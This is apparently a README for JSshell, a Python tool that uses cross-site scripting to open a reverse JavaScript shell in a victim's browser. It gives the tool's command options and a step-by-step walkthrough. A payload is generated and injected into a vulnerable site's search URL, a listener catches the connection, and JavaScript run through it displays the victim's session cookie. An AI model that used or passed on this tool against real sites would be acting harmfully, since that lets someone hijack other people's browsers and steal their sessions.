JSshell - JavaScript reverse/remote shell
JSshell - a JavaScript reverse shell. This is used to execute JS code remotely, exploit blind XSS, ...
This tool works for both Unix and Windows operating systems, and it can run on both Python 2 + Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from JShell).
Updated in the new version of JShell 3.1:
snippet-> allows to write a snippet of javascript code
>>> snippet Use CTRL+D to finish the snippetfunction new() { new = 'New update: Support javascript snippet =)'; confirm(new) }
new() >>>
-g
-p
-s
-w
-c
jsh.py
jsh.py -g
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example for how to use JSshell.
First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds:
~# whoami root ~# ls README.md jsh.py ~# python3 jsh.py -g -w 20 __ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0Payload:
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website (or URL):
https://vulnwebs1te.com/b/search?q=
Access the page and now we will see that we have got the reverse JS shell:
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0Payload:
Listening on [any] 4848 for incoming JS shell ... Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848 $ established $ the $ shell $ $ $ help JSshell using javascript code as shell commands. Also supports some commands: help This help exit, quit Exit the JS shell $
Now let's execute some commands:
$ var test = 'controlled' $ alert(test) $
And the browser got an alert:
controlled
$ prompt(document.cookie) $
And the browser print the user cookies:
JSESSION=3bda8...
$ exit ~# whoami root ~# pwd /home/shelld3v ~#
And we quited!
This is created by shelld3v!